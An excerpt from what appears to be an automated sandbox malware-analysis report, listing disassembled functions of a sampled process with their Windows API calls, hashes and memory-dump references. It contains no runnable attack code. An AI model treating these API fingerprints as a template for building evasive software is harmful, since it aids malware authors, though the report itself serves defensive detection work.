                                              • Opcode ID: cf12e6e239de63517c96860523d0d4b9234ac7fff30a5727b1b1c8c1a0e218b5
                                              • Instruction ID: 344cbc620c5f473b3449d30255c535b95d3c57b14afcdb8a94e7bf7355338f22
                                              • Opcode Fuzzy Hash: cf12e6e239de63517c96860523d0d4b9234ac7fff30a5727b1b1c8c1a0e218b5
                                              • Instruction Fuzzy Hash: 09318F31600209AFDF219F78DC45BEA7BA9FB89334F204715F979A21E0D730E891AB50
                                              Function 00F14817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F1489F
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F148B3
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F148D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: d97c02a387b3f6a86e23a5d383e7fc801ffd49a1dac4b26c12e0b507d19e4f38
                                              • Instruction ID: 85512cd556c173c45dee20b9d0c79f575e8846eff44224eeae2e8a1a66b658e0
                                              • Opcode Fuzzy Hash: d97c02a387b3f6a86e23a5d383e7fc801ffd49a1dac4b26c12e0b507d19e4f38
                                              • Instruction Fuzzy Hash: 73219132600219AFDF158F90CC46FEA3BB9EF88724F150114FA156B1D0D6B5B895ABA0
                                              Function 00F14FB2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F15064
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F15072
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F15079
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 766233ab8128873aa497bf4aec52095008b470aeecef4b34e90535fc4abd9f56
                                              • Instruction ID: d34065f8fdb56711232f95b2c3edfb7e40c7a4c6eba9a8d60fba32ddf03655f5
                                              • Opcode Fuzzy Hash: 766233ab8128873aa497bf4aec52095008b470aeecef4b34e90535fc4abd9f56
                                              • Instruction Fuzzy Hash: 3E2192B5600209AFDB11DF54DC81DAB37ECEF9A7A4B000559FA049B361CB31EC51EB60
                                              Function 00F14116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F1419F
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F141AF
                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F141D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 72c2096d2dc86c54143434719bf7b5a049bf96671a4b41aa8177a1a26ff9e009
                                              • Instruction ID: 411c2cc9a881de412994ca02910893d58fb4cb5742e92dea99decfa0ef992817
                                              • Opcode Fuzzy Hash: 72c2096d2dc86c54143434719bf7b5a049bf96671a4b41aa8177a1a26ff9e009
                                              • Instruction Fuzzy Hash: 8521C232610218BBEF128F54DC84EEB376EEFD9764F118114FA14AB190C671ACD2A7A0
                                              Function 00F14B4A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F14BAE
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F14BC3
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F14BD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: 7e7932a7d55a9c3bc4f776142c33e22ef40e734c740cb0cba056af3523ac9722
                                              • Instruction ID: 3ba977d06ef0d0d3f89f24fab7dfcd6ae47337aa8b2fbce8e9ea4b84c2c6de84
                                              • Opcode Fuzzy Hash: 7e7932a7d55a9c3bc4f776142c33e22ef40e734c740cb0cba056af3523ac9722
                                              • Instruction Fuzzy Hash: 5B11E331244208BEEF119F65CC06FEB7BA8EFC5B64F114515FA55E60A0D671E861EB20
                                              Function 00F161E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F16220
                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F1624D
                                              • DrawMenuBar.USER32(?), ref: 00F1625C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$InfoItem$Draw
                                              • String ID: 0
                                              • API String ID: 3227129158-4108050209
                                              • Opcode ID: 0d70929e8a739236e16f3384425ade4a82a5bb90925014706e7eef369c096438
                                              • Instruction ID: b319c5b0501e348bd0e166fdccfd3fc86e6461e1270c3d0e3a0796e7deb77420
                                              • Opcode Fuzzy Hash: 0d70929e8a739236e16f3384425ade4a82a5bb90925014706e7eef369c096438
                                              • Instruction Fuzzy Hash: 3B01AD32600218EFDF109F50DC84BEA7BB5FF49750F048095F849DA150CB308980EF20
                                              Function 00EE090F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31a38dbfffc168dc09367f4a0952bedc336341dbe0926af086550533e969d921
                                              • Instruction ID: 64a23ce9cf6dddcfcfd1e28ad35b054f55f7f5fc20ee59b7c6c2c54e977eb4b0
                                              • Opcode Fuzzy Hash: 31a38dbfffc168dc09367f4a0952bedc336341dbe0926af086550533e969d921
                                              • Instruction Fuzzy Hash: 54C18F75A0024AEFDB14CF95C894EAEB7B5FF88708F209598E405EB251D771EE81CB90
                                              Function 00EB4210 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                              • Instruction ID: 2f0712eb8f3df9962f16676afe6ad1fd87a0bda96631a3ddcb2cf3532a4c5dea
                                              • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                              • Instruction Fuzzy Hash: FFA134B2A002869FDB25CF58C891BEFBBE4EF55314F18516DE595BB2C3C6388942C750
                                              Function 00EE0CC6 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                              Download Yara Rule
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F20BD4,?), ref: 00EE0E80
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F20BD4,?), ref: 00EE0E98
                                              • CLSIDFromProgID.OLE32(?,?,00000000,00F1DCE0,000000FF,?,00000000,00000800,00000000,?,00F20BD4,?), ref: 00EE0EBD
                                              • _memcmp.LIBVCRUNTIME ref: 00EE0EDE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 8ba21210fd10ed2bcf0d4f54d29e92c7f303dda9b1e14298cd747d28740fbf16
                                              • Instruction ID: c1931f91ed8b9075f5bb4fe121e963d8be3214740ede60f8fc66b7101cf3ff9d
                                              • Opcode Fuzzy Hash: 8ba21210fd10ed2bcf0d4f54d29e92c7f303dda9b1e14298cd747d28740fbf16
                                              • Instruction Fuzzy Hash: F481E771A00109AFCF04DF95C984EEEB7B9EF89315F205568E506BB260DB71AE46CB60
                                              Function 00F0AFDB Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00F0B00B
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00F0B019
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00F0B0FB
                                              • CloseHandle.KERNEL32(00000000), ref: 00F0B10A
                                                • Part of subcall function 00E9E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00EC4D4D,?), ref: 00E9E30F
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                              • String ID:
                                              • API String ID: 1991900642-0
                                              • Opcode ID: b1fdae0184699e230c323f6524e6fc4ec55c4682eb18f97fd84f456c489fb811
                                              • Instruction ID: 14d3e893f37a2fcd529104ab53eb2eb36b858a4286452146fe9d3a04abc706f9
                                              • Opcode Fuzzy Hash: b1fdae0184699e230c323f6524e6fc4ec55c4682eb18f97fd84f456c489fb811
                                              • Instruction Fuzzy Hash: 6E515C71508300AFD710EF24C885A6BBBE8FF89754F40491DF989A72A1EB70E904DB92
                                              Function 00F02433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00F0245A
                                              • WSAGetLastError.WSOCK32 ref: 00F02468
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F024E7
                                              • WSAGetLastError.WSOCK32 ref: 00F024F1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast$socket
                                              • String ID:
                                              • API String ID: 1881357543-0
                                              • Opcode ID: 7815ec62c506f69198b1fae26364713faa51b1a778b85e507891ab33964c1251
                                              • Instruction ID: 3c0fccc4d8a88c2735d1719b4e8924c4814b74da12d6db0591a7810f4a8455d4
                                              • Opcode Fuzzy Hash: 7815ec62c506f69198b1fae26364713faa51b1a778b85e507891ab33964c1251
                                              • Instruction Fuzzy Hash: 1F41B174600201AFE720AF24C89AF2A77E5AB05714F54C488F95DAF2D3D772ED41DBA0
                                              Function 00F16BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00F16C41
                                              • ScreenToClient.USER32(?,?), ref: 00F16C74
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F16CE1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 538d7fa89270f8d4b490999ecff6b8927db8a80676b465707abb46376f750597
                                              • Instruction ID: 48cc7a222aff1709bed1dba9de91b5f11e87889a76c5d691c36b99c4254d6279
                                              • Opcode Fuzzy Hash: 538d7fa89270f8d4b490999ecff6b8927db8a80676b465707abb46376f750597
                                              • Instruction Fuzzy Hash: EE514B70A00208AFCB14CF64D9809EE7BB5FF55361F218259F965DB2A0D730AD81EF90
                                              Function 00EF6033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EF60DD
                                              • GetLastError.KERNEL32(?,00000000), ref: 00EF6103
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EF6128
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EF6154
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: ff95c8eaead79a3b6a2b243c88723eb35297bb4ccc6e7f5b3e0d581ad25c3a8e
                                              • Instruction ID: 9baf3883752b9dda0c931985aa4d75d7fa5be834bb840da71b64c32ad4bb37d4
                                              • Opcode Fuzzy Hash: ff95c8eaead79a3b6a2b243c88723eb35297bb4ccc6e7f5b3e0d581ad25c3a8e
                                              • Instruction Fuzzy Hash: 6E413539200614DFCB10EF15C544A5ABBE2EF89324B198088E99EAB362CB35FD01DB91
                                              Function 00F12039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00F1204A
                                                • Part of subcall function 00EE42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE42E6
                                                • Part of subcall function 00EE42CC: GetCurrentThreadId.KERNEL32 ref: 00EE42ED
                                                • Part of subcall function 00EE42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EE2E43), ref: 00EE42F4
                                              • GetCaretPos.USER32(?), ref: 00F1205E
                                              • ClientToScreen.USER32(00000000,?), ref: 00F120AB
                                              • GetForegroundWindow.USER32 ref: 00F120B1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: b69afef98e3536bfc74b373785b89d423bc251ad92e7256b1858f1eb60750c93
                                              • Instruction ID: d437d9e68bad85260698659715d16050b539dee46fcbf061daff69a117aab5cc
                                              • Opcode Fuzzy Hash: b69afef98e3536bfc74b373785b89d423bc251ad92e7256b1858f1eb60750c93
                                              • Instruction Fuzzy Hash: 78315271D00109AFC744EFA6C881CEEB7F8EF48314B50846AE519E7251D671DE45CB90
                                              Function 00EEE7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E84154: _wcslen.LIBCMT ref: 00E84159
                                              • _wcslen.LIBCMT ref: 00EEE7F7
                                              • _wcslen.LIBCMT ref: 00EEE80E
                                              • _wcslen.LIBCMT ref: 00EEE839
                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00EEE844
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen$ExtentPoint32Text
                                              • String ID:
                                              • API String ID: 3763101759-0
                                              • Opcode ID: 64963c2b4e28fa4360cff1bb968fd80a9b03412ee169370943dda5046b2fdd8c
                                              • Instruction ID: c1150faf7f0322909a24d9696366769c2736b3f88185776eee9f256739954e52
                                              • Opcode Fuzzy Hash: 64963c2b4e28fa4360cff1bb968fd80a9b03412ee169370943dda5046b2fdd8c
                                              • Instruction Fuzzy Hash: 0C21EAB1D01214AFDB14DFA4C981BAEB7F4EF46364F145055E808BF385D6709D4187A1
                                              Function 00EE8184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00EE960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00EE8199,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?), ref: 00EE961B
                                                • Part of subcall function 00EE960C: lstrcpyW.KERNEL32(00000000,?,?,00EE8199,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE9641
                                                • Part of subcall function 00EE960C: lstrcmpiW.KERNEL32(00000000,?,00EE8199,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?), ref: 00EE9672
                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE81B2
                                              • lstrcpyW.KERNEL32(00000000,?,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE81D8
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EE8FE3,00000000,?,0000001C,?,?,00000000), ref: 00EE8213
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 0fc77a4939afc7bbdea68be9504962df24c32c01ffe2cf29bf8ec6309650773a
                                              • Instruction ID: 0577b0442780018c1673baaa5d5140c125c5fcf55dc5cb166e3cd2e26412da23
                                              • Opcode Fuzzy Hash: 0fc77a4939afc7bbdea68be9504962df24c32c01ffe2cf29bf8ec6309650773a
                                              • Instruction Fuzzy Hash: 42113B3A20034AABCB145F75D944EBA77F5FF99354B40A02AF906DB260EF31D801D390
                                              Function 00F18621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F1866A
                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F18689
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F186A1
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EFC10A,00000000), ref: 00F186CA
                                                • Part of subcall function 00E82441: GetWindowLongW.USER32(00000000,000000EB), ref: 00E82452
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
